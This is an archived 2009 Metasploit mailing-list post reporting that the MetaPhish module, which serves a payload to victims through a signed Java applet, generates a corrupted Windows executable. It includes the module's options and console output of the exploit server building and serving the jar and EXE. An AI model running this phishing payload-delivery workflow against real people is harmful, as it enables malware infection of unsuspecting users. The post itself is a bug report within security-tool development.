Metasploit mailing list archives
metaphish win32pe corrupt binary
From: reydecopas at gmail.com (reydecopas)
Date: Thu, 13 Aug 2009 21:04:14 +0200
svn At revision 6954. Metaphish works but win32exe generated is corrupted. modules/exploits/windows/browser/meta-phish.rb: @msf_payload = Msf::Util::EXE.to_win32pe(framework,payload.encoded) ******************************************************* Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- COMPANY_NAME MetaPhish LLC. yes Company Name COMPANY_WEBSITE http://carnal0wnage.attackresearch.com/ yes Company Website OUTPUTPATH /tmp/ yes Working directory location. SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Use SSL URIPATH no The URI to use for this exploit (default is random) Payload information: Space: 8192 Description: This module deploys a payload via a signed Java applet. msf exploit(meta-phish) > exploit [*] Exploit running as background job. msf exploit(meta-phish) > [*] File hCqQQpHf.java created. [*] File hCqQQpHf.class created. [*] Store Password = ksHodVRZ [*] Key Password = OkZjzZtE [*] Building Keystore.... [*] Keystore metaphish_keystore Built!! [*] Creating Signed jar file.... [*] Jar hCqQQpHf.jar created. Warning: The signer certificate will expire within six months. [*] Signed Jar shCqQQpHf.jar created. [*] Added URL: http://0.0.0.0:8080/uJrrejYW.exe [*] Added URL: http://0.0.0.0:8080/hCqQQpHf.class [*] Added URL: http://0.0.0.0:8080/shCqQQpHf.jar [*] Using URL: http://0.0.0.0:8080/4OmVmn2iWaL1IR [*] Local IP: http://192.168.1.200:8080/4OmVmn2iWaL1IR [*] Server started. [*] Sending Applet. [*] Sending signed jar: shCqQQpHf.jar [*] Sending signed jar: shCqQQpHf.jar [*] Sending EXE: /uJrrejYW.exe ******************************************* binary /uJrrejYW.exe is CORRUPTED PE import section is corrupted. binary attached in rar with password corrupted -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090813/7f86f707/attachment.html> -------------- next part -------------- A non-text attachment was scrubbed... Name: uJrrejYW.rar Type: application/rar Size: 9396 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090813/7f86f707/attachment.rar>
Current thread:
- metaphish win32pe corrupt binary reydecopas (Aug 13)